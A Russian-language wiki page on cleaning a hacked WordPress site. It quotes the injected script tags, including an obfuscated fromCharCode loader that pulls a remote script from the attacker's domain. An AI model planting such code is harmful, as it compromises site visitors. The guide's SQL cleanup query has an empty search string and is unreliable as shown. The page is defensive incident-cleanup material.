Wordpress - чистка от постороннего кода lovegreenpencils: различия между версиями

Wordpress - чистка от постороннего кода lovegreenpencils

Взломали сайт и внедрили

1) посторонний код в файлы сайта  https://dock.lovegreenpencils.ga/m.js?n=nb5. Проверить вставки можно через команду
 # egrep -r "lovegreenpencils" *
а именно вставили
 <script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>
и
 <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
2) посторонний код в базу - https://dock.lovegreenpencils.ga/m.js?n=nb5
3) Подменили в базе siteurl/home в таблице wp_options

Алгоритм чистки:

1) Вычистить код с БД sql запросом:
UPDATE wp_posts SET post_content = REPLACE(post_content,"",'') WHERE post_content LIKE '%lovegreenpencils%'
2) Исправить siteurl/home в таблице wp_options на свой URL.
3) Создать папку для бекапа:
/home/user/domains/site.com/public_html/badfiles
Почистить файлы от кода через скрипт https://iphwiki.net/files/clear_wp1.txt
где заменить на свои папки:
$backup_dir = "/home/user/domains/site.com/public_html/badfiles"; - бекап файлов с вредоносным кодом
$html_dir = "/home/user/domains/site.com/public_html"; - корневая папка сайта
4) Проверить работу сайта. Обновить все плагины, тему, скрипт до последней версии. Поменять пароли от админ панели.